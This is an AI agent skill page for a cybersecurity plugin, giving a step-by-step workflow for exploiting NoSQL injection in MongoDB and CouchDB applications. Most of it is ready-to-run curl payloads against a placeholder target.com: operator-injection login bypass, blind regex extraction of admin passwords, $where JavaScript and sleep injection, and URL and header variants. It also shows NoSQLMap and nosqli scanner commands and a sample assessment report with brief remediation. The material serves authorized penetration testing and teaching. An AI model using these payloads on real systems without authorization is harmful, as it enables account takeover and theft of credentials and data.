Skill

exploiting-nosql-injection-vulnerabilities

Detects and exploits NoSQL injection in MongoDB/CouchDB via JSON payloads for auth bypass and data extraction during web app pentesting and API security audits.

MongoDB

Python

Bash

security

database

npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skills

Tool Access

This skill uses the workspace's default tool permissions.

Preview

- During web application penetration testing of applications using NoSQL databases

Supporting Assets

LICENSEassets/template.mdreferences/api-reference.mdreferences/standards.mdreferences/workflows.mdscripts/agent.pyscripts/process.py

SKILL.md

Similar Skills

applying-brand-guidelines

41.6k

Applies Acme Corporation brand guidelines including colors, fonts, layouts, and messaging to generated PowerPoint, Excel, and PDF documents.

3 files

anthropics-claude-cookbooks

creating-financial-models

41.6k

Builds DCF models with sensitivity analysis, Monte Carlo simulations, and scenario planning for investment valuation and risk assessment.

2 files

anthropics-claude-cookbooks

analyzing-financial-statements

41.6k

Calculates profitability (ROE, margins), liquidity (current ratio), leverage, efficiency, and valuation (P/E, EV/EBITDA) ratios from financial statements in CSV, JSON, text, or Excel for investment analysis.

2 files

anthropics-claude-cookbooks

Stats

Stars5748

Forks783

Last CommitApr 6, 2026

Actions

View Source View Plugin View on GitHub View README

Exploiting NoSQL Injection Vulnerabilities

When to Use

During web application penetration testing of applications using NoSQL databases
When testing authentication mechanisms backed by MongoDB or similar databases
When assessing APIs that accept JSON input for database queries
During bug bounty hunting on applications with NoSQL backends
When performing security code review of database query construction

Prerequisites

Burp Suite Professional or Community Edition with JSON support
NoSQLMap tool installed (pip install nosqlmap or from GitHub)
Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists)
Target application using a NoSQL database (MongoDB, CouchDB, Cassandra)
Proxy configured for HTTP traffic interception
Python 3.x for custom payload scripting

Workflow

Step 1 — Identify NoSQL Injection Points

# Look for JSON-based login forms or API endpoints
# Common indicators: application accepts JSON POST bodies, uses MongoDB
# Test with basic syntax-breaking characters
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin\"", "password": "test"}'

# Test for operator injection in query parameters
curl "http://target.com/api/users?username[$ne]=invalid"

# Check for error-based detection
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"query": {"$gt": ""}}'

Step 2 — Perform Authentication Bypass

# Basic authentication bypass with $ne operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}'

# Bypass with $gt operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'

# Target specific user with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": ".*"}}'

# Bypass using $exists operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$exists": true}, "password": {"$exists": true}}'

Step 3 — Extract Data Using Boolean-Based Blind Injection

# Extract username character by character using $regex
# Test if first character of admin password is 'a'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^a"}}'

# Test if first two characters are 'ab'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^ab"}}'

# Enumerate usernames with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$regex": "^adm"}, "password": {"$ne": "invalid"}}'

Step 4 — Exploit JavaScript Injection via $where

# JavaScript injection through $where operator
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.username == \"admin\""}'

# Time-based detection with sleep
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "sleep(5000) || this.username == \"admin\""}'

# Data exfiltration via $where with string comparison
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.password.match(/^a/) != null"}'

Step 5 — Use NoSQLMap for Automated Testing

# Clone and setup NoSQLMap
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap
python setup.py install

# Run NoSQLMap against target
python nosqlmap.py -u http://target.com/api/login \
  --method POST \
  --data '{"username":"test","password":"test"}'

# Alternative: use nosqli scanner
pip install nosqli
nosqli scan -t http://target.com/api/login -d '{"username":"*","password":"*"}'

Step 6 — Test URL Parameter Injection

# Parameter-based injection (GET requests)
curl "http://target.com/api/users?username[$ne]=&password[$ne]="
curl "http://target.com/api/users?username[$regex]=admin&password[$gt]="
curl "http://target.com/api/users?username[$exists]=true"

# Array injection via URL parameters
curl "http://target.com/api/users?username[$in][]=admin&username[$in][]=root"

# Inject via HTTP headers if processed by backend
curl http://target.com/api/profile \
  -H "X-User-Id: {'\$ne': null}"

Key Concepts

Concept	Description
Operator Injection	Injecting MongoDB operators ($ne, $gt, $regex) into query parameters
Authentication Bypass	Using operators to match any document and bypass login checks
Blind Extraction	Character-by-character data extraction using $regex boolean responses
$where Injection	Executing arbitrary JavaScript on the MongoDB server via $where operator
Type Juggling	Exploiting how NoSQL databases handle different input types (string vs object)
BSON Injection	Manipulating Binary JSON serialization in MongoDB wire protocol
Server-Side JS	JavaScript execution context available in MongoDB for query evaluation

Tools & Systems

Tool	Purpose
NoSQLMap	Automated NoSQL injection detection and exploitation framework
Burp Suite	HTTP proxy for intercepting and modifying JSON requests
MongoDB Shell	Direct database interaction for testing query behavior
nosqli	Dedicated NoSQL injection scanner and exploitation tool
PayloadsAllTheThings	Curated NoSQL injection payload repository
Nuclei	Template-based scanner with NoSQL injection detection templates
Postman	API testing platform for crafting NoSQL injection requests

Common Scenarios

Login Bypass — Bypass MongoDB-backed authentication using {"$ne": ""} operator injection in username and password fields
Data Enumeration — Extract database contents character by character using $regex blind injection when no direct output is visible
Privilege Escalation — Modify user role fields through NoSQL injection in profile update endpoints
API Key Extraction — Extract API keys or tokens stored in MongoDB collections through boolean-based blind techniques
Account Takeover — Enumerate valid usernames via regex injection then brute-force passwords through operator-based authentication bypass

Output Format

## NoSQL Injection Assessment Report
- **Target**: http://target.com/api/login
- **Database**: MongoDB 6.0
- **Vulnerability Type**: Operator Injection (Authentication Bypass)
- **Severity**: Critical (CVSS 9.8)

### Vulnerable Parameters
| Endpoint | Parameter | Injection Type | Impact |
|----------|-----------|---------------|--------|
| POST /api/login | username | Operator ($ne) | Auth Bypass |
| POST /api/login | password | Regex ($regex) | Data Extraction |
| GET /api/users | id | $where JS Injection | RCE Potential |

### Proof of Concept
- Authentication bypass achieved with: {"username":{"$ne":""},"password":{"$ne":""}}
- Extracted 3 admin passwords via blind regex injection
- JavaScript execution confirmed via $where operator

### Remediation
- Use parameterized queries with MongoDB driver sanitization
- Implement input type validation (reject objects where strings expected)
- Disable server-side JavaScript execution ($where) in MongoDB config
- Apply least-privilege database access controls